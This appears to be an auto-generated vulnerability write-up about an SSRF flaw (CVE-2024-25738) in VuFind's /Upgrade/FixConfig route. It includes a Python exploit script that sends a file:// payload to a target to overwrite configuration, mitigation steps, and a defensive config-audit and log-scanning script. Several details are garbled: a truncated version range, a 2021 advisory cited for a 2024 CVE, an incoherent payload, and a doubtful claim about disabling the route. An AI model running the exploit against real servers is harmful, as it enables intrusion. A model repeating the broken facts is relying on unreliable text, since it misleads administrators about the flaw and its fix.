A recently discovered Server-Side Request Forgery (SSRF) vulnerability, identified by CVE-2024-25738, affects Open Library Foundation's VuFind software in versions ranging from 2. through 9.1 before 9.1.1. This vulnerability allows a remote attacker to overwrite local configuration files, leading to unauthorized admin panel access and the potential for Remote Code Execution (RCE). However, successful exploitation requires the 'allow_url_include' PHP runtime setting to be turned on, which is off by default in most installations. Additionally, the /Upgrade route needs to be exposed, which is the case by default after installing VuFind.

Vulnerable Route - /Upgrade/FixConfig

The vulnerable route, /Upgrade/FixConfig, can be exploited by an attacker to modify the VuFind configuration files.

Original References

1. VulDB Entry: https://vuldb.com/?id.167741
2. VuFind Security Advisory: https://vufind.org/wiki/security:2021:15
3. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25738

Here is the sample exploit code for this SSRF vulnerability:

import requests

# Target route: the vulnerable /Upgrade/FixConfig handler
target_url = 'http://TARGET_ADDRESS/vufind/Upgrade/FixConfig'
# The 'source' value points the handler at a local file: URL instead of an HTTP one
payload = 'file:///etc/vufind2/config.ini.txt?source=XXX%A[Extra_Settings]%AautoConfigure%20=%20false'

# Send the payload as the 'source' query parameter
exploit_request = requests.get(target_url, params={'source': payload})

# An HTTP 200 response is taken here as the success signal
if exploit_request.status_code == 200:
    print('Exploit Success: Configuration file overwritten.')
else:
    print('Exploit Failed')

Replace 'TARGET_ADDRESS' with the target server's address.

Upgrade to VuFind 9.1.1 or later

The most effective way to protect against this vulnerability is to upgrade your VuFind installation to version 9.1.1 or later, which has resolved the issue.

Disable 'allow_url_include' in PHP settings

To mitigate this vulnerability, ensure that the 'allow_url_include' setting is turned off in your PHP runtime environment.

Disable /Upgrade route exposure

The /Upgrade route exposure can be disabled by setting autoConfigure to false in the config.ini file.

[Extra_Settings]
autoConfigure = false
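As an added example (not part of the original advisory or of VuFind itself), the following Python script audits the two settings above and scans web-server access-log lines for requests to /Upgrade/FixConfig whose 'source' parameter carries a non-HTTP URL such as file://; the config.ini, php.ini and log lines embedded in it are constructed samples.

```python
import configparser
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample inputs for the checks below (not from any real deployment).
SAMPLE_CONFIG_INI = "[Extra_Settings]\nautoConfigure = true\n"
SAMPLE_PHP_INI = "allow_url_fopen = On\nallow_url_include = On\n"
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [22/May/2024:19:20:01 +0000] "GET /vufind/Search/Results?lookfor=dune HTTP/1.1" 200 5123',
    '10.0.0.9 - - [22/May/2024:19:21:44 +0000] "GET /vufind/Upgrade/FixConfig?source=file%3A%2F%2F%2Fetc%2Fvufind2%2Fconfig.ini HTTP/1.1" 200 812',
    '10.0.0.9 - - [22/May/2024:19:22:10 +0000] "GET /vufind/Upgrade/FixConfig HTTP/1.1" 302 0',
]

TRUTHY = ('1', 'on', 'true', 'yes')
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3}')


def config_findings(vufind_config_ini, php_ini):
    """Return the settings that keep this CVE reachable: exposed /Upgrade route, allow_url_include on."""
    findings = []
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(vufind_config_ini)
    # Look in every section so the check holds whichever section carries autoConfigure.
    values = [cp.get(s, 'autoConfigure') for s in cp.sections() if cp.has_option(s, 'autoConfigure')]
    # A missing key counts as exposed, since the route is exposed by default after install.
    if not values or any(v.strip().lower() in TRUTHY for v in values):
        findings.append('autoConfigure is not false: /Upgrade route stays exposed')
    m = re.search(r'^\s*allow_url_include\s*=\s*(\S+)', php_ini, re.MULTILINE)
    if m and m.group(1).lower() in TRUTHY:
        findings.append('allow_url_include is On: a successful SSRF can escalate to code execution')
    return findings


def suspicious_fixconfig_requests(log_lines):
    """Flag /Upgrade/FixConfig requests whose source parameter is not an http(s) URL."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group('target'))
        if not url.path.endswith('/Upgrade/FixConfig'):
            continue
        for source in parse_qs(url.query).get('source', []):
            scheme = urlsplit(source).scheme.lower()
            if scheme not in ('', 'http', 'https'):
                hits.append((m.group('target'), scheme))
    return hits


if __name__ == '__main__':
    print(config_findings(SAMPLE_CONFIG_INI, SAMPLE_PHP_INI))
    print(suspicious_fixconfig_requests(SAMPLE_ACCESS_LOG))
```

Point the functions at your real config.ini, php.ini contents and access log to run the same checks against a live installation.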

Conclusion

The SSRF vulnerability (CVE-2024-25738) in the /Upgrade/FixConfig route of Open Library Foundation VuFind 2. to 9.1 can lead to unauthorized administrator access and possibly even Remote Code Execution (RCE). Properly securing your environment by upgrading VuFind, disabling the 'allow_url_include' setting in PHP, and disabling exposure of the /Upgrade route are essential steps in mitigating this threat.

Timeline

Published on: 05/22/2024 19:15:08 UTC
Last modified on: 08/22/2024 20:35:05 UTC